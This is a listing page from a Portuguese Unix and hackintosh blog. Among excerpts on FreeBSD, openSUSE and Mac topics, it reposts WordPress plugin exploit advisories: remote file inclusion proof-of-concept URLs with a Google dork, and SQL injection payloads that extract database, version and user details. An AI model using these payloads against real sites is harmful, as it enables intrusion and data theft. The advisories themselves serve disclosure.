AppUnix Um portal sobre Unix-Like Sem igual

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 by little_oak

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested) — PoC — http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI — Vulnerable Code — // Move folder request handled when called by GET AJAX if (isset($_GET[‘ru_folder’])) { // WP setup …

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 by little_oak

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested) — PoC — http://SERVER/db_unx_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work) — Vulnerable Code — if (isset($_FILES[‘wpmm-upload’])) { …

P5KPL-AM SE updates no lion 10.7.1 current ocorreram muito bem no hackintosh

21/09/2011 by little_oak

Boa noite grandes mestres, só estamos postando esta informação extra para deixar o coração dos amantes de hackintosh mais tranquilizados. Fizemos, neste instante todas as updates disponíveis pela apple na arquitetura 10.7.1 (current) em cima do seguinte hardware: Cpu – 2160 (intel dual core), 2 gb de ram ddr 800, VGA nvidia 8500gt, P5KPL-AM SE …

Itens básicos para entrar no mundo Hackintosh

19/09/2011 by Shell

Olá galera… tudo na paz? Vixe, muito tempo sem escrever aqui galera….. Mas é por uma nobre causa….. tenho me esforçado ao máximo para adquirir conhecimentos que facilitem as explicações e melhorem os artigos a vocês nossos leitores….. hoje eu queria esclarecer alguns aspectos que considero fundamentais ao entusiastas ao mundo hackintosh….. Não quero ser …

Lançado FreeBSD 9.0-BETA2

15/09/2011 by little_oak

Ken Smith has announced the availability of the second beta of FreeBSD 9.0, more than a month later than planned: “The second beta build of the 9.0-RELEASE release cycle is now available. Note: the location of the FTP install tree and ISOs have changed slightly. What we used for BETA2 reflects a directory structure that …

Como instalar Adobe Air mais recente + TweetDeck no Mac Os X Lion

07/09/2011 by little_oak

É bem verdade que com os recursos do Flex dá para ser feito um monte de coisas bacanas. Muitos já devem conhecer a ferramenta TweetDeck (a qual já até citamos em outro post, porém para Android, caso queira companhar basta clicar no top 2011 aplicativos para android). Neste post iremos mostrar como instalar de forma …

openSUSE 12.1 Milestone 5 Lançado

06/09/2011 by little_oak

Bryen Yunashko has announced the availability of the third milestone release of openSUSE 12.1: “openSUSE 12.1’s milestone 5 is now ready for download. Here are some interesting things you can expect to see when you try milestone 5: further changes have been made to systemd which replaces the SysInitV system, the default is …

WordPress PureHTML plugin <= 1.0.0 SQL Injection

11/12/2015 by little_oak

# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off ————— PoC (POST data) ————— http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1′ AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— if(!isset($_POST[‘PureHTMLNOnce’])){ if ( !db_unx_verify_nonce( $_POST[‘PureHTMLNOnce’], …

WordPress yolink Search plugin <= 1.1.4 SQL Injection

06/09/2011 by little_oak

# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] …

WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection

06/09/2011 by little_oak

# Exploit Title: WordPress wp audio gallery playlist plugin < = 0.12 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip # Version: 0.12 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20 --------------- Vulnerable code --------------- $table_name = $wpdb->prefix …